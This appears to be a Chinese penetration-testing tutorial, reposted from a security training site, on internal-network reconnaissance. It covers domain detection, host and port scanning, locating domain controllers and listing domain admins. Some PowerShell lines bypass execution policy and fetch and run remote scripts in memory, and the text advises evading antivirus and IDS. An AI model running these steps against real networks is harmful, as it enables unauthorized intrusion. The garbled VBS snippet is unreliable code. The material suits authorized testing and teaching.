内网渗透-内网信息收集

1.判断是否有域

ipconfig /all
systeminfo
net config workstation
net time /domain

判断主域，一般域服务器都会同时作为时间服务器

这里分为3中情况：

存在域，并且当前用户是域用户

不存在域，当前网络环境为工作组

存在域，但当前用户不是域用户

2.域内主机探测

（避免使用暴力扫描工具或图形化工具触发反病毒软件）
（可以在白天和晚上各探测一遍来分析主机的存活数量）
nbtscan.exe

下载链接：nbtscan-1.0.35.exe

扫描结果
sharing:可能有打印共享服务
DC: 可能是域控制器
U=user:可能是登录名为user的用户
IIS:可能安装了IIS服务器
EXCHANEGE:可能安装了微软的exchange
?:未识别出该机器的NETBIOS资源，可使用-f继续扫描

利用icmp协议扫描

ping

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=” 

VBS

strSubNet = "192.168.33." Set objFSO= CreateObject("Scripting.FileSystemObject") Set objTS = objfso.CreateTextFile("C:\Users\test1\AppData\Local\Temp\res.txt") For i = 1 To 254 strComputer = strSubNet  Invoke-ARPScan -CIDR 192.168.33.0/24}” >> C:\Users\test1\Desktop\log.txt 

远程运行

powershell.exe -exec bypass -c "IEX{New-Object Net.WebClient}.DownloadString(‘脚本地址’);invoke-ARPScan-CIDR 192.168.1.1/24">>C:\windows\temp\log.txt： 

1. 无文件运行（没有运行文件，在内存中运行）

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.33.1/PowerSploit-master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.33.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt" 

利用TCP/UDP扫描探测

ScanLine

下载链接：ScanLine

sl.exe -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O C:\Users\test1\AppData\Local\Temp\log.txt -p 192.168.33.1-254 /b 

3.域内端口扫描

扫描注意是否会触发IDS

Powersploit的invoke-portscan.ps1脚本

github下载链接：invoke-portscan.ps1

powershell.exe -exec bypass -Command "Invoke-Portscan -Hosts 192.168.33.0/24 -T 4 -ports '445,1433,80,8080,3389' -oA c:\ProgramData\ip_info"} 

执行结束后会生成一个ip_info.xml的文件会显示出扫描结果：
命令格式：

powershell.exe -exec bypass -Command " powerview的命令参数}" 

端口 Banner 信息

4.域内控制器的查找

nltest /dclist:yuaneuro.cn
nslookup -type=SRV _ldap._tcp
net time /domain
net group "domain controllers" /domain

5.域内用户和管理员的获取

查询所有域用户列表

net user /domain
wmic useraccount get /all

net localgroup administrators /domain
dsquery user
只能在DC上执行

查询域管理员用户组

net group "domain admins" /domain
net group "Enterprise admins" /domain

转载请注明来自网盾网络安全培训，本文标题：《内网渗透-内网信息收集》

标签：内网渗透内网安全网络安全内网域控